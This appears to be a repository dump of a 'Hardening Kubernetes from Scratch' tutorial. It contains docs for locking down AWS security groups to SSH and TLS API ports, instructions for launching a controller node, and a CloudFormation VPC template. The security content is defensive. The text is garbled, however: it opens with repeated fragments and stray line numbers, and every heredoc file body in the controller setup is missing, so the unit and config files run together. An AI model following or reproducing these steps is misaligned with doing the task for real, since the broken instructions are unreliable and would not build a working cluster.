kubelet.service < kubeconfig < kube-proxy.service < kubelet.service < kubeconfig < kube-proxy.service < kubelet.service < kubeconfig < kube-proxy.service < 4m v1.9.2 706 | ip-10-1-0-11 Ready 2m v1.9.2 707 | ip-10-1-0-12 Ready 46s v1.9.2 708 | ``` 709 | 710 | #### Install ```kube-dns``` 711 | 712 | ##### Create the 
```kube-dns.yml``` Definition 713 | 714 | ``` 715 | cat > kube-dns.yml < kubeconfig < ca-config.json < ca-csr.json < admin-csr.json < kubernetes-csr.json < kube-apiserver.service < 16d v1.9.2 272 | ip-10-1-0-11 Ready 16d v1.9.2 273 | ip-10-1-0-12 Ready 16d v1.9.2 274 | ``` 275 | 276 | Fantastic! From outside the cluster, we only allow SSH (`tcp/22`), and client certificates are now needed to access the Kubernetes API Server over TLS (`tcp/6443`). All sorts of attacks are now thwarted, so we're done, right? Well, depending on the workload and the access to the cluster, it *may* be sufficient, but we'll test those assumptions. 277 | 278 | [Back](/README.md#level-1-hardening) | [Next](deploy-vulnapp.md) 279 | -------------------------------------------------------------------------------- /docs/l1-security-groups.md: -------------------------------------------------------------------------------- 1 | # Level 1 Hardening - Security Groups 2 | 3 | ## Limit the services available externally 4 | 5 | In the [creation of the VPC](create-vpc.md) instructions, the security group protecting the EC2 instances had this rule applied to simulate leaving everything "wide open" to the Internet: 6 | 7 | ``` 8 | $ aws ec2 authorize-security-group-ingress --region ${AWS_DEFAULT_REGION} \ 9 | --group-id ${SG_ID} --protocol all --port 0 \ 10 | --cidr $(dig +short myip.opendns.com @resolver1.opendns.com)/32 11 | ``` 12 | 13 | If we had used `0.0.0.0/0`, that would be true. Instead, we used our source IP in its place to avoid being completely irresponsible. 14 | 15 | Given that direct access to the services running on the cluster in their current configuration is a `root`-privileged remote command execution vulnerability, it's time to change that. 16 | 17 | So, let's do the least amount of work possible to remedy this.
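Before adding or removing anything, it can help to review what the security group currently allows. A sketch, assuming `${SG_ID}` is populated as shown in the next steps:

```
# Show the current ingress rules for the instance security group
$ aws ec2 describe-security-groups --region ${AWS_DEFAULT_REGION} \
    --group-ids ${SG_ID} --query 'SecurityGroups[0].IpPermissions'
```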
18 | 19 | Export the necessary variables: 20 | ``` 21 | $ export STACK_NAME="hkfs" 22 | $ export AWS_DEFAULT_REGION="us-east-1" 23 | $ export KEY_NAME="hkfs" 24 | ``` 25 | Obtain the Security Group ID: 26 | ``` 27 | $ VPC_ID="$(aws cloudformation describe-stacks --region ${AWS_DEFAULT_REGION} \ 28 | --query 'Stacks[*].Outputs[?OutputKey==`VPCId`].OutputValue[]' \ 29 | --stack-name ${STACK_NAME} --output text)" 30 | $ SG_ID="$(aws ec2 describe-security-groups --query 'SecurityGroups[*].GroupId' \ 31 | --region ${AWS_DEFAULT_REGION} --filter "Name=vpc-id,Values=${VPC_ID}" --output text)" 32 | ``` 33 | 34 | Add two rules which only allow `tcp/22` for SSH and `tcp/6443` from your source IP address instead of "all": 35 | ``` 36 | $ aws ec2 authorize-security-group-ingress --region ${AWS_DEFAULT_REGION} \ 37 | --group-id ${SG_ID} --protocol tcp --port 22 \ 38 | --cidr $(dig +short myip.opendns.com @resolver1.opendns.com)/32 39 | $ aws ec2 authorize-security-group-ingress --region ${AWS_DEFAULT_REGION} \ 40 | --group-id ${SG_ID} --protocol tcp --port 6443 \ 41 | --cidr $(dig +short myip.opendns.com @resolver1.opendns.com)/32 42 | ``` 43 | Remove the old rule that allowed "all" from your source IP: 44 | ``` 45 | $ aws ec2 revoke-security-group-ingress --region ${AWS_DEFAULT_REGION} \ 46 | --group-id "${SG_ID}" --protocol all --port 0 \ 47 | --cidr $(dig +short myip.opendns.com @resolver1.opendns.com)/32 48 | ``` 49 | 50 | Confirm you can still SSH into your nodes: 51 | ``` 52 | $ export ETCD_IP=$(aws ec2 describe-instances \ 53 | --region ${AWS_DEFAULT_REGION} \ 54 | --filter 'Name=tag:Name,Values=etcd' \ 55 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 56 | --output text) 57 | $ export CONTROLLER_IP=$(aws ec2 describe-instances \ 58 | --region ${AWS_DEFAULT_REGION} \ 59 | --filter 'Name=tag:Name,Values=controller' \ 60 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 61 | --output text) 62 | $ export WORKER1_IP=$(aws ec2 describe-instances \ 63 | --region ${AWS_DEFAULT_REGION} \ 64 | --filter 'Name=tag:Name,Values=worker-1' \ 65 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 66 | --output text) 67 | $ export WORKER2_IP=$(aws ec2 describe-instances \ 68 | --region ${AWS_DEFAULT_REGION} \ 69 | --filter 'Name=tag:Name,Values=worker-2' \ 70 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 71 | --output text) 72 | 73 | $ ssh -i ${KEY_NAME}.pem ubuntu@${ETCD_IP} 74 | $ ssh -i ${KEY_NAME}.pem ubuntu@${CONTROLLER_IP} 75 | $ ssh -i ${KEY_NAME}.pem ubuntu@${WORKER1_IP} 76 | $ ssh -i ${KEY_NAME}.pem ubuntu@${WORKER2_IP} 77 | ``` 78 | 79 | Confirm that you can no longer reach `etcd`: 80 | ``` 81 | $ nc -vz ${ETCD_IP} 2379 82 | nc: connectx to ETCD_IP port 2379 (tcp) failed: Operation timed out 83 | ``` 84 | 85 | Confirm that you can no longer reach the Insecure API Server: 86 | ``` 87 | $ nc -vz ${CONTROLLER_IP} 8080 88 | nc: connectx to CONTROLLER_IP port 8080 (tcp) failed: Operation timed out 89 | ``` 90 | 91 | Confirm that you can no longer reach the Kubelet's Read/Write API Service: 92 | ``` 93 | $ nc -vz ${CONTROLLER_IP} 10250 94 | nc: connectx to CONTROLLER_IP port 10250 (tcp) failed: Operation timed out 95 | $ nc -vz ${WORKER1_IP} 10250 96 | nc: connectx to WORKER1_IP port 10250 (tcp) failed: Operation timed out 97 | $ nc -vz ${WORKER2_IP} 10250 98 | nc: connectx to WORKER2_IP port 10250 (tcp) failed: Operation timed out 99 | ``` 100 | 101 | Finally, confirm that 
you can reach the API Server service on the secure port if it were running. We should expect a "connection refused" error as the request reached the instance and sent a TCP reset because nothing is currently listening on `tcp/6443`: 102 | 103 | ``` 104 | $ nc -vz ${CONTROLLER_IP} 6443 105 | nc: connectx to CONTROLLER_IP port 6443 (tcp) failed: Connection refused 106 | ``` 107 | 108 | Remember that the instance security group has itself listed as being able to access itself. This means that since all instances have this same security group assigned, they can access each other directly. The rules modified here apply to all "external" access control, and we've limited access to just `tcp/22` and `tcp/6443` from our source IP. 109 | 110 | Now, it's time to generate and enable TLS on the Kubernetes API Server service listening on `tcp/6443`. 111 | 112 | [Back](/README.md#level-1-hardening) | [Next](l1-api-tls.md) 113 | -------------------------------------------------------------------------------- /docs/launch-configure-controller.md: -------------------------------------------------------------------------------- 1 | # Launch and Configure the ```controller``` Instance 2 | 3 | ## Instance Creation 4 | From the same shell on the installation system, create the ```controller``` instance 5 | ``` 6 | $ aws ec2 run-instances \ 7 | --region ${AWS_DEFAULT_REGION} \ 8 | --image-id ${IMAGE_ID} \ 9 | --count 1 \ 10 | --instance-type t2.small \ 11 | --key-name ${KEY_NAME} \ 12 | --subnet-id ${SUBNET_ID} \ 13 | --associate-public-ip-address \ 14 | --query 'Instances[0].InstanceId' \ 15 | --tag-specifications 'ResourceType=instance,Tags=[{Key=Name,Value=controller}]' \ 16 | --private-ip-address 10.1.0.10 \ 17 | --block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=32}' \ 18 | --output text 19 | ``` 20 | 21 | Disable Source/Destination Checking for ```kube-proxy``` 22 | ``` 23 | $ aws ec2 modify-instance-attribute \ 24 | --region ${AWS_DEFAULT_REGION} \ 25 | --no-source-dest-check \ 26 | --instance-id "$(aws ec2 describe-instances \ 27 | --region ${AWS_DEFAULT_REGION} \ 28 | --filter 'Name=tag:Name,Values=controller' \ 29 | --query 'Reservations[].Instances[].InstanceId' \ 30 | --output text)" 31 | ``` 32 | 33 | ## Installation and Configuration 34 | 35 | SSH Into the ```controller``` Instance 36 | ``` 37 | $ ssh -i ${KEY_NAME}.pem ubuntu@$(aws ec2 describe-instances \ 38 | --region ${AWS_DEFAULT_REGION} \ 39 | --filter 'Name=tag:Name,Values=controller' \ 40 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 41 | --output text) 42 | ``` 43 | 44 | Install Docker and Other Necessary Binaries 45 | ``` 46 | $ sudo apt-get update 47 | $ sudo apt-get install docker.io socat conntrack --yes 48 | ``` 49 | 50 | Configure and Start Docker 51 | ``` 52 | $ echo "DOCKER_OPTS=--ip-masq=false --iptables=false \ 53 | --log-driver=json-file --log-level=warn --log-opt=max-file=5 \ 54 | --log-opt=max-size=10m \ 55 | --storage-driver=overlay" | sudo tee -a /etc/default/docker 56 | $ sudo systemctl daemon-reload 57 | $ sudo systemctl restart docker.service 58 | ``` 59 | 60 | Verify Docker is Running 61 | ``` 62 | $ sudo docker ps 63 | ``` 64 | 65 | Enable Forwarding for ```kube-proxy``` Functions 66 | ``` 67 | $ sudo iptables -P FORWARD ACCEPT 68 | ``` 69 | 70 | Download the Kubernetes Binaries 71 | ``` 72 | $ export K8S_RELEASE="1.9.2" 73 | $ wget -q --show-progress --https-only --timestamping \ 74 | 
"https://storage.googleapis.com/kubernetes-release/release/v${K8S_RELEASE}/bin/linux/amd64/kube-apiserver" \ 75 | "https://storage.googleapis.com/kubernetes-release/release/v${K8S_RELEASE}/bin/linux/amd64/kube-controller-manager" \ 76 | "https://storage.googleapis.com/kubernetes-release/release/v${K8S_RELEASE}/bin/linux/amd64/kube-scheduler" \ 77 | "https://storage.googleapis.com/kubernetes-release/release/v${K8S_RELEASE}/bin/linux/amd64/kubectl" \ 78 | "https://storage.googleapis.com/kubernetes-release/release/v${K8S_RELEASE}/bin/linux/amd64/kube-proxy" \ 79 | "https://storage.googleapis.com/kubernetes-release/release/v${K8S_RELEASE}/bin/linux/amd64/kubelet" 80 | ``` 81 | 82 | Make the Kubernetes Binaries Executable and Place them in the PATH 83 | ``` 84 | $ chmod +x kube-apiserver kube-controller-manager kube-scheduler kubectl kubelet kube-proxy 85 | $ sudo mv kube-apiserver kube-controller-manager kube-scheduler \ 86 | kubectl kubelet kube-proxy /usr/local/bin/ 87 | ``` 88 | 89 | Create Supporting Directories 90 | ``` 91 | $ sudo mkdir -p \ 92 | /etc/cni/net.d \ 93 | /opt/cni/bin \ 94 | /var/lib/kubelet \ 95 | /var/lib/kube-proxy \ 96 | /var/lib/kubernetes \ 97 | /var/run/kubernetes 98 | ``` 99 | 100 | Download the CNI Plugins for ```kubenet``` 101 | ``` 102 | $ wget -q --show-progress --https-only --timestamping \ 103 | "https://github.com/containernetworking/plugins/releases/download/v0.6.0/cni-plugins-amd64-v0.6.0.tgz" 104 | ``` 105 | 106 | Install the CNI Plugins 107 | ``` 108 | $ sudo tar -xvf cni-plugins-amd64-v0.6.0.tgz -C /opt/cni/bin/ 109 | ``` 110 | 111 | Configure the ```kube-apiserver``` Systemd Unit 112 | ``` 113 | $ cat > kube-apiserver.service < kube-controller-manager.service < kube-scheduler.service < kubelet.service < kubeconfig < kube-proxy.service < etcd.service < kubelet.service < kubeconfig < kube-proxy.service < kubelet.service < kubeconfig < kube-proxy.service < 4m v1.9.2 430 | ip-10-1-0-11 Ready 2m v1.9.2 431 | ip-10-1-0-12 Ready 46s v1.9.2 432 | ``` 433 | 434 | [Back](/README.md#build-the-cluster) | [Next](create-kubeconfig.md) 435 | -------------------------------------------------------------------------------- /etcd.dump: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hardening-kubernetes/from-scratch/983dbe2c225ce62d696791a453a790c5b3b05ad4/etcd.dump -------------------------------------------------------------------------------- /etcdctl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hardening-kubernetes/from-scratch/983dbe2c225ce62d696791a453a790c5b3b05ad4/etcdctl -------------------------------------------------------------------------------- /img/arch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hardening-kubernetes/from-scratch/983dbe2c225ce62d696791a453a790c5b3b05ad4/img/arch.png -------------------------------------------------------------------------------- /templates/hkfs.json: -------------------------------------------------------------------------------- 1 | { 2 | "AWSTemplateFormatVersion": "2010-09-09", 3 | "Description": "AWS CloudFormation Template to hold the Hardening Kubernete from Scratch Tutorial workload", 4 | "Resources": { 5 | "VPC": { 6 | "Type": "AWS::EC2::VPC", 7 | "Properties": { 8 | "CidrBlock": "10.1.0.0/16", 9 | "EnableDnsSupport" : "true", 10 | "EnableDnsHostnames" : "true", 11 | "Tags": [ 12 | { 13 | "Key": "Name", 
14 | "Value": "hkfs-vpc" 15 | } 16 | ] 17 | } 18 | }, 19 | "Subnet": { 20 | "Type": "AWS::EC2::Subnet", 21 | "Properties": { 22 | "VpcId": { 23 | "Ref": "VPC" 24 | }, 25 | "CidrBlock": "10.1.0.0/24", 26 | "Tags": [ 27 | { 28 | "Key": "Name", 29 | "Value": "hkfs-subnet" 30 | } 31 | ] 32 | } 33 | }, 34 | "InternetGateway": { 35 | "Type": "AWS::EC2::InternetGateway", 36 | "Properties": { 37 | "Tags": [ 38 | { 39 | "Key": "Name", 40 | "Value": "hkfs-igw" 41 | } 42 | ] 43 | } 44 | }, 45 | "AttachGateway": { 46 | "Type": "AWS::EC2::VPCGatewayAttachment", 47 | "Properties": { 48 | "VpcId": { 49 | "Ref": "VPC" 50 | }, 51 | "InternetGatewayId": { 52 | "Ref": "InternetGateway" 53 | } 54 | } 55 | }, 56 | "RouteTable": { 57 | "Type": "AWS::EC2::RouteTable", 58 | "Properties": { 59 | "VpcId": { 60 | "Ref": "VPC" 61 | }, 62 | "Tags": [ 63 | { 64 | "Key": "Name", 65 | "Value": "hkfs-rt" 66 | } 67 | ] 68 | } 69 | }, 70 | "Route": { 71 | "Type": "AWS::EC2::Route", 72 | "DependsOn": "AttachGateway", 73 | "Properties": { 74 | "RouteTableId": { 75 | "Ref": "RouteTable" 76 | }, 77 | "DestinationCidrBlock": "0.0.0.0/0", 78 | "GatewayId": { 79 | "Ref": "InternetGateway" 80 | } 81 | } 82 | }, 83 | "SubnetRouteTableAssociation": { 84 | "Type": "AWS::EC2::SubnetRouteTableAssociation", 85 | "Properties": { 86 | "SubnetId": { 87 | "Ref": "Subnet" 88 | }, 89 | "RouteTableId": { 90 | "Ref": "RouteTable" 91 | } 92 | } 93 | } 94 | }, 95 | "Outputs": { 96 | "VPCId": { 97 | "Description": "VPCId of the newly created VPC", 98 | "Value": { "Ref":"VPC" } 99 | } 100 | } 101 | } 102 | --------------------------------------------------------------------------------